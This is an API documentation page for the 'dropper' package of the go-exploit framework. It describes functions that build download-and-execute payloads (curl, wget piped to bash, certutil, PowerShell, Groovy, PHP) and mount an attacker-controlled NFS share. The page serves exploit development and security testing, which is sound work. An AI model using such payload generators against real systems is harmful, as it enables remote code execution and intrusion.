dropper

package

v1.47.0 Latest Latest Go to latest Published: Jul 29, 2025 License: Apache-2.0 Imports: 4 Imported by: 2

Details

Valid go.mod file
Redistributable license
Tagged version
Stable version
Learn more about best practices

Repository

github.com/vulncheck-oss/go-exploit

Links

Open Source Insights

Documentation ¶

Overview ¶

File dropper download and execute payloads.

The dropper package contains all the code for download and execute payloads. Unlike the other payloads this package is necessarily OS dependent for both the download and execution portions.

Index ¶

Variables
type Dropper
type GroovyPayload
- func (groovy *GroovyPayload) HTTP(lhost string, lport int, downloadFile string, output string) string
type PHPPayload
- func (php *PHPPayload) HTTP(lhost string, lport int, ssl bool, downloadFile string) string
type UnixPayload
type WindowsPayload

Constants ¶

This section is empty.

Variables ¶

View Source

var (
	Unix    = &UnixPayload{}
	Windows = &WindowsPayload{}
	Groovy  = &GroovyPayload{}
	PHP     = &PHPPayload{}
)

View Source

var (
	//go:embed php/dropper.php
	PHPDropper string
	//go:embed php/dropper_secure.php
	PHPDropperSecure string
)

Functions ¶

This section is empty.

Types ¶

type Dropper ¶

type Dropper interface{}

type GroovyPayload ¶ added in v1.16.0

type GroovyPayload struct{}

func (*GroovyPayload) HTTP ¶ added in v1.19.0

func (groovy *GroovyPayload) HTTP(lhost string, lport int, downloadFile string, output string) string

Using Groovy, download a remote file, set it to executable, execute it, and delete it.

type PHPPayload ¶ added in v1.19.0

type PHPPayload struct{}

func (*PHPPayload) HTTP ¶ added in v1.19.0

func (php *PHPPayload) HTTP(lhost string, lport int, ssl bool, downloadFile string) string

Using PHP: download a remote file, write a tmp file, set it to executable, execute it, and delete it.

type UnixPayload ¶

type UnixPayload struct{}

func (*UnixPayload) CurlHTTP ¶

func (unix *UnixPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with curl, execute it, and delete it.

func (*UnixPayload) CurlHTTPDownloadOnly ¶ added in v1.44.0

func (unix *UnixPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, output string) string

Download a remote file with curl, but do not execute/delete it. You also need to provide your own full file path, .exe will not be appended like the others. Lastly the full output file path needs to be specified in the output parameter.

func (*UnixPayload) EitherHTTP ¶

func (unix *UnixPayload) EitherHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with curl or wget, execute it, and delete it.

func (*UnixPayload) Mountv3Only ¶ added in v1.47.0

func (unix *UnixPayload) Mountv3Only(lhost string, lshareDir string, rshareDir string) string

Mount a remote NFS directory using NFS v3. This will mount the attacker controlled share at <lhost>:<lshareDir> and make it available to the attacker at <rshareDir>. Usage example:

Mountv3Only("10.9.49.2","/tmp/nfsshare", "./b")

This function does not attempt to actually execute any files on the share

func (*UnixPayload) WgetHTTP ¶ added in v1.27.0

func (unix *UnixPayload) WgetHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote bash script with wget and pipe it to bash.

type WindowsPayload ¶

type WindowsPayload struct{}

func (*WindowsPayload) CertutilHTTP ¶

func (win *WindowsPayload) CertutilHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with certutil.exe, execute it, and delete it (after execution).

func (*WindowsPayload) CertutilHTTPDownloadOnly ¶ added in v1.46.0

func (win *WindowsPayload) CertutilHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, outputPath string) string

Much like CurlHTTPDownloadOnly, this function will generate the certutil.exe command to download a file and save it to the provided location.

downloadCmd := dropper.Windows.CertutilHTTPDownloadOnly(httpFileServer.HTTPAddr, httpFileServer.HTTPPort, httpFileServer.TLS, httpFileServer.GetRandomName(""), destFilePath)

func (*WindowsPayload) CurlHTTP ¶

func (win *WindowsPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with curl.exe, execute it, and delete it (after execution).

func (*WindowsPayload) CurlHTTPDownloadOnly ¶ added in v1.44.0

func (win *WindowsPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, output string) string

Download a remote file with curl.exe, but do not execute/delete it. You also need to provide your own full file path, .exe will not be appended like the others. Lastly the full output file path needs to be specified in the output parameter.

func (*WindowsPayload) PowershellHTTP ¶

func (win *WindowsPayload) PowershellHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with PowerShell, execute it, and delete it (after execution).

Source Files ¶

View all Source files

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL